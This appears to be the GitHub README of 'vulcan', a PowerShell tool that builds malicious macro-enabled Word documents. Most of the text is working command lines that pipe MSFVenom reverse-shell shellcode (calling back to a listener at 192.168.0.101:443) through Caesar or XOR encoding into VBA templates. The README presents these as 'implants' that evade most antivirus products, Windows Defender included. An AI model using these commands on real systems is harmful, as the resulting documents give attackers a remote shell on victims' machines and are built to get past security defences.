A PowerShell
script to automate the creation of consitent and efficient macro-enabled Word
documents. At the time of writing, the indirect
template yields great results at evading most AVs, including Windows Defender
in some cases.
This PowerShell
script can be viewed as kind of a third-party add-on to MSFVenom - made possible thanks to Windows Subsystem for Linux - that leverage templates to quickly and easily - encoded - create Word
implants.
Users/stargazers are greatly encouraged toward contributing to improving and extending this project. 🐺
- Decoding routines/functions (
.\assets\decoders
) -> do not hesitate to submit new templates. - Piping of shellcodes allowing for complex transformations in order to evade AVs.
Visual Basic
templating (.\assets\templates
) -> do not hesitate to submit new templates.- Work-around
Visual Basic
line-continuation limitations using-Treshold
.
- Windows Subsystem for Linux with MSFVenom installed.
-
Clone this repository:
git clone https://github.com/aress31/vulcan cd vulcan
-
Load the
PowerShell
scripts:Import-Module -Name .\Vulcan.psm1
-
(Optional) List available commands:
Get-Module -Name vulcan | select -ExpandProperty ExportedFunctions
-
Run
vulcan
:wsl --exec msfvenom -p windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
Although obvious,
windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread
is a placeholder in the above example... 🙄
Get-Help -Name Invoke-Vulcan
is your friend... Your best friend is Get-Help -Name Invoke-Vulcan -Detailed
. Nonetheless, Invoke-Vulcan
must be fed a hex
-formatted shellcode. This can be achieved with:
Get-Content -Path $ShellCode | Invoke-Vulcan ...
wsl --exec msfvenom ... -f hex | Invoke-Vulcan ...
-
Embed a
plain
shellcode:wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba"
-
Embed a
Caesar
-encoded shellcode:wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-Caesar -Key 5 | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder Caesar -DecoderPath ".\assets\decoders\caesar.vba" -Key 5 -Verbose
-
Embed a
XOR
-encoded shellcode:wsl --exec msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread -f hex | ` Invoke-XOR -Key "StarWatchThisRepo" | ` Invoke-Vulcan -OutputDirectory ".\winwords\" -Template ".\assets\templates\indirect.vba" -Decoder XOR -DecoderPath ".\assets\decoders\xor.vba" -Key "StarWatchThisRepo" -Verbose
pwsh.in.vulcan.2022-07-31.04-20-56.mp4
[!WARNING] The length of the key must be shorted than the shellcode.
Although obvious,
windows/shell/reverse_tcp LHOST=192.168.0.101 LPORT=443 EXITFUNC=thread
is a placeholder in the above examples... 🙄
If you want to support this project and appreciate the time invested in developping, maintening and extending it; consider donating toward my next (cup of coffee ☕/lamborghini 🚗) - as a lot of my personal time went into creating this project. 😪
It is easy, all you got to do is press the Sponsor
button at the top of this page or alternatively click this link. 😁
Found a bug 🐛? I would love to squash it!
Please report all issues on the GitHub issues tracker.
You would like to contribute to better this project? 🤩
Please submit all PRs
on the GitHub pull requests tracker.
Give to Caesar (no pun intended 🙄) what belongs to Caesar:
vulcan
is distributed under the terms of the BSD 3
.
See LICENSE for details.